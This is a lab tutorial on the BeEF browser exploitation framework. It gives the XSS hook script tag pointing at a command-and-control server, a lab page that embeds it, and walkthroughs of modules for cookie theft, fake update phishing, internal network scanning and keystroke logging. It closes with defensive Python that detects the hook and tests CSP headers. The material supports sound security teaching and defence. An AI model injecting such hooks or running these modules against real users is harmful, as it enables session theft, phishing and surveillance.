Ethical Hacking | #beef #xss #browser-exploitation

BeEF Browser Exploitation Framework: Lab Guide

Set up BeEF XSS framework, hook browsers, use exploitation modules, and practice browser-based attacks ethically in an isolated lab environment.


BeEF Browser Exploitation Framework: Lab Setup and Usage Guide

BeEF (Browser Exploitation Framework) is an open-source penetration testing tool focused on exploiting vulnerabilities in web browsers. While most security tools attack the network perimeter or the server, BeEF targets what is often the weakest link: the end user’s browser. Security professionals use BeEF to demonstrate the real-world impact of Cross-Site Scripting (XSS) vulnerabilities in authorized assessments and training labs.

Legal and ethical notice: BeEF must only be used in isolated lab environments or against systems you have explicit written permission to test. Hooking someone else’s browser without consent is a criminal offense in most jurisdictions.

How BeEF Works

BeEF operates through a concept called hooked browsers. When a target visits a page containing the BeEF hook script, their browser connects to your BeEF server and remains under your command-and-control interface. You can then run modules — JavaScript-based commands — against the hooked browser without any additional interaction from the victim.

The hook is a single JavaScript tag:

<script src="http://YOUR_BEEF_IP:3000/hook.js"></script>

This script is injected into vulnerable pages via XSS, social engineering, or a controlled lab test page.

Installation

On Kali Linux (Pre-installed)

# Start BeEF directly
cd /usr/share/beef-xss
sudo ./beef

Manual Installation (Ubuntu/Debian)

# Install dependencies
sudo apt update
sudo apt install ruby ruby-dev build-essential libssl-dev libreadline-dev \
    zlib1g-dev nodejs npm git curl -y

# Clone BeEF
git clone https://github.com/beefproject/beef.git
cd beef

# Install Ruby gems
sudo gem install bundler
bundle install

# Run BeEF
./beef

On first run, BeEF prompts you to change the default credentials. Always do this — the defaults (beef/beef) are publicly known.

Configuration

The main config file is config.yaml in the BeEF root:

beef:
  credentials:
    user: "admin"
    passwd: "YourStrongPassword!"
  http:
    host: "0.0.0.0"
    port: 3000
    public: ""   # Set to your public IP if running behind NAT

After saving, restart BeEF.

Accessing the Web UI

Once BeEF starts, it outputs two URLs:

[*] BeEF is loading...
[*] UI URL:   http://127.0.0.1:3000/ui/panel
[*] Hook URL: http://127.0.0.1:3000/hook.js

Open the UI URL in your browser and log in with your credentials. The dashboard shows:

  • Online Browsers — actively hooked sessions
  • Offline Browsers — previously hooked sessions
  • Module Tree — all available exploitation modules
  • Logs — real-time event stream

Setting Up a Lab Test Page

Create a simple HTML page that loads the hook in your controlled lab:

<!DOCTYPE html>
<html>
<head>
    <title>Demo Page</title>
</head>
<body>
    <h1>Welcome to the Lab Test Page</h1>
    <p>This simulates a vulnerable web application.</p>
    <!-- BeEF hook injection point (simulates XSS) -->
    <script src="http://192.168.1.100:3000/hook.js"></script>
</body>
</html>

Serve it locally:

python3 -m http.server 8080

Open the page in a test VM’s browser. Within seconds, the browser appears in BeEF’s Online Browsers panel.
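The lab page above is also a useful target for the defender's view of the same hook: an injected script tag is just one more external script in the HTML. The following script is an added example (not BeEF project code) that lists every external script on a page, resolves it against the page URL, and flags cross-origin scripts that lack a Subresource Integrity attribute, are loaded over plaintext HTTP, or are named hook.js. The sample page is constructed for the example and mirrors the lab page, with one extra CDN script that carries a placeholder integrity value; the page URL lab.example is likewise an assumption.

```python
"""Audit the <script> tags of an HTML page for signs of an injected hook.

Added example, not part of BeEF. The sample page below is constructed and
reuses the lab hook address (192.168.1.100:3000) from this guide.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: the lab test page plus a CDN script with (placeholder) SRI.
LAB_PAGE = """<!DOCTYPE html>
<html><head><title>Demo Page</title>
<script src="https://cdn.example.com/lib.js"
        integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
</head>
<body>
<h1>Welcome to the Lab Test Page</h1>
<script>console.log("inline script");</script>
<script src="/static/app.js"></script>
<script src="http://192.168.1.100:3000/hook.js"></script>
</body></html>"""


class ScriptCollector(HTMLParser):
    """Collects the attribute dict of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.scripts.append(dict(attrs))


def origin(url):
    """(scheme, host, port) triple used for same-origin comparison."""
    parts = urlsplit(url)
    return (parts.scheme, parts.hostname, parts.port)


def audit_scripts(html, page_url):
    """Return one finding per external script; 'issues' is empty when nothing is wrong."""
    collector = ScriptCollector()
    collector.feed(html)
    page_origin = origin(page_url)
    findings = []
    for attrs in collector.scripts:
        src = attrs.get("src")
        if not src:
            continue  # inline scripts are governed by CSP, not by SRI
        absolute = urljoin(page_url, src)  # resolve relative paths against the page
        cross_origin = origin(absolute) != page_origin
        finding = {
            "src": absolute,
            "cross_origin": cross_origin,
            "sri": "integrity" in attrs,
            "issues": [],
        }
        if cross_origin and not finding["sri"]:
            finding["issues"].append("cross-origin script without integrity attribute")
        if cross_origin and urlsplit(absolute).scheme == "http":
            finding["issues"].append("cross-origin script loaded over plaintext HTTP")
        if urlsplit(absolute).path.endswith("/hook.js"):
            finding["issues"].append("file name matches the BeEF hook script")
        findings.append(finding)
    return findings


def flagged_sources(findings):
    """URLs of scripts that raised at least one issue."""
    return [f["src"] for f in findings if f["issues"]]


if __name__ == "__main__":
    for f in audit_scripts(LAB_PAGE, "https://lab.example/index.html"):
        status = "; ".join(f["issues"]) or "ok"
        print(f"{f['src']}: {status}")
```

Run it against the HTML your test application actually serves (save the page and feed it to audit_scripts with the real page URL); a script flagged on all three counts is exactly what the hook looks like from the defender's side.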

Exploring the Module Tree

BeEF organizes modules into categories:

Category             Description
Network              LAN discovery, port scanning via browser
Browser              Fingerprinting, plugin detection, history theft
Social Engineering   Fake update dialogs, credential phishing overlays
Host                 Detect OS, screen size, clipboard content
User Interface       Alert boxes, fake notifications, tab operations
Misc                 WebRTC IP leak, geolocation, camera access (with permission prompt)

Commonly Used Modules

Browser Fingerprinting

In the module tree, navigate to Browser > Hooked Domain > Get Cookie. This retrieves cookies accessible from JavaScript (those without the HttpOnly flag set).

Navigate to Browser > Fingerprinting > Get System Info to collect:

  • Browser name, version, and user agent
  • OS type and version
  • Screen resolution
  • Installed plugins (Flash, Java, etc. — legacy)
  • Whether the browser has Java enabled

Social Engineering: Fake Update Notification

One of the most realistic demonstration modules:

  1. Select your hooked browser
  2. Navigate to Social Engineering > Fake Notification Bar (Firefox)
  3. Set the notification message: “Critical security update available. Click here to install.”
  4. Set the URL to your controlled page
  5. Click Execute

The victim sees a realistic browser-style notification bar. This demonstrates why XSS is rated Critical in bug bounties — it enables phishing at the application layer, bypassing all network-layer controls.

Network: Internal Network Fingerprinting

Module: Network > Fingerprint Network

This module uses XMLHttpRequests and image loading tricks to map internal RFC 1918 addresses behind the victim’s browser. It can reveal internal hosts that are not accessible from the internet — a significant pivot opportunity in an authorized red-team scenario.

Redirecting the Browser

Module: Browser > Hooked Domain > Redirect Browser

Set the target URL and execute. The hooked browser navigates to a page of your choice — useful in demonstrations to show the full scope of XSS impact.

Capturing Keystrokes

Module: Host > Get Visited URLs
Module: User Interface > Stream Keystroke Logger

The keystroke logger streams everything typed in the browser window back to your BeEF panel. In a lab context, this powerfully illustrates why session isolation and CSP headers matter.

Using BeEF’s REST API

BeEF exposes a REST API for scripting and integration:

# Authenticate to obtain an API token (BeEF also prints this API key in the
# terminal at startup); the login endpoint expects a JSON body
curl -s -X POST "http://127.0.0.1:3000/api/admin/login" \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","password":"YourPassword"}'
# The JSON response contains the token to use in later calls

# List all hooked browsers; the token is passed as the "token" query parameter
curl -s "http://127.0.0.1:3000/api/hooks?token=YOUR_TOKEN"

This enables automating module execution in red-team playbooks.

Combining BeEF with Metasploit

BeEF integrates with the Metasploit Framework for browser-specific exploits. Enable the integration in config.yaml, where the Metasploit settings sit under the beef: extension: block:

beef:
  extension:
    metasploit:
      enable: true
      host: "127.0.0.1"
      port: 55552
      user: "msf"
      pass: "abc123"

Metasploit's RPC daemon (msfrpcd) must be running and listening on that host and port with the same credentials, otherwise BeEF cannot connect to it at startup.

This surfaces Metasploit browser modules directly in BeEF’s module tree — useful for testing whether a hooked browser is vulnerable to known browser engine exploits in an isolated lab VM.

Defensive Insights

Using BeEF in your lab teaches you how to defend against these attacks:

  • Content Security Policy (CSP): A properly configured CSP (script-src 'self') blocks the hook script from loading entirely.
  • HttpOnly cookies: Prevents JavaScript from reading session cookies.
  • X-Frame-Options: Reduces clickjacking vectors that complement XSS.
  • Subresource Integrity (SRI): Ensures CDN-hosted scripts have not been tampered with.
  • Browser sandboxing: Modern browsers restrict cross-origin requests, limiting what hook.js can do.

Run BeEF against your own test application with and without these headers to see the concrete difference.
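To make that comparison concrete, the following added example (not BeEF project code) does two things: it serves the lab page either with or without the defensive headers from the list above, and it evaluates offline whether a given Content-Security-Policy would let the hook script load, so you can predict the result before starting the browser. The CSP matcher covers 'self', 'none', scheme sources such as https:, and host sources including *.example.com wildcards. The hook address 192.168.1.100:3000 comes from the lab page; the test-app origin 192.168.1.50:8080 and the session cookie are assumptions made for the example.

```python
"""Serve the lab page with or without defensive headers, and check offline
whether a Content-Security-Policy would let the BeEF hook script load.

Added example, not part of BeEF. Assumes the lab hook at
http://192.168.1.100:3000 and a test application served on port 8080.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

HOOK_SRC = "http://192.168.1.100:3000/hook.js"  # hook address from the lab page

# Constructed page: the lab page with the hook script tag
LAB_PAGE = """<!DOCTYPE html><html><head><title>Demo Page</title></head>
<body><h1>Welcome to the Lab Test Page</h1>
<script src="http://192.168.1.100:3000/hook.js"></script>
</body></html>"""

# Headers from the Defensive Insights list; the cookie value is a stand-in
HARDENED_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; frame-ancestors 'none'",
    "X-Frame-Options": "DENY",
    "Set-Cookie": "session=lab; HttpOnly; SameSite=Lax",
}


def parse_csp(header):
    """Map each directive name to its list of source expressions."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def _host_source_matches(src, script):
    """Match a scheme-source ('https:') or host-source ('cdn.example.com', '*.example.com')."""
    if src.endswith(":") and "//" not in src:  # scheme-source
        return script.scheme == src[:-1].lower()
    pattern = urlsplit(src if "://" in src else "//" + src)
    if pattern.scheme and pattern.scheme != script.scheme:
        return False
    host_pat, host = pattern.hostname or "", script.hostname or ""
    if host_pat.startswith("*."):
        if not host.endswith(host_pat[1:]):
            return False
    elif host_pat != host:
        return False
    return pattern.port is None or pattern.port == script.port


def script_allowed(csp_header, script_url, page_origin):
    """True if the policy (script-src, else default-src) permits loading script_url."""
    policy = parse_csp(csp_header)
    sources = policy.get("script-src", policy.get("default-src"))
    if sources is None:
        return True  # no directive governs scripts: anything loads
    script, page = urlsplit(script_url), urlsplit(page_origin)
    for src in sources:
        if src == "'none'":
            return False
        if src == "*":
            return True
        if src == "'self'":
            if (script.scheme, script.hostname, script.port) == (page.scheme, page.hostname, page.port):
                return True
            continue
        if src.startswith("'"):
            continue  # nonce/hash/unsafe-* keywords do not match a URL source
        if _host_source_matches(src, script):
            return True
    return False


def response_headers(hardened):
    """Defensive headers the lab app sends; an empty dict reproduces the unprotected page."""
    return dict(HARDENED_HEADERS) if hardened else {}


class LabHandler(BaseHTTPRequestHandler):
    hardened = True  # flipped by serve()

    def do_GET(self):
        body = LAB_PAGE.encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        for name, value in response_headers(self.hardened).items():
            self.send_header(name, value)
        self.end_headers()
        self.wfile.write(body)


def serve(port=8080, hardened=True):
    """Blocking server; run once hardened and once with --unprotected and compare."""
    LabHandler.hardened = hardened
    print(f"Serving lab page on :{port} ({'hardened' if hardened else 'unprotected'})")
    HTTPServer(("0.0.0.0", port), LabHandler).serve_forever()


if __name__ == "__main__":
    import sys
    serve(hardened="--unprotected" not in sys.argv)
```

With the hardened headers the browser refuses to fetch hook.js and logs a CSP violation in its console, so the session never appears in the Online Browsers panel; with --unprotected it hooks within seconds as before. Note that the CSP check is an approximation of the browser's matching rules (it ignores path matching and port defaults), which is enough to predict the outcome in this lab but not a substitute for testing in the browser.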

Summary

BeEF transforms the abstract concept of XSS into a live command-and-control demonstration. Setting it up in a lab and walking through modules — fingerprinting, social engineering overlays, internal network scanning — builds deep intuition for why XSS vulnerabilities deserve Critical severity ratings. The framework is most valuable as an educational tool that makes attack surface visible, which directly informs better defensive architecture decisions.

#penetration-testing #web-security #browser-exploitation #xss #beef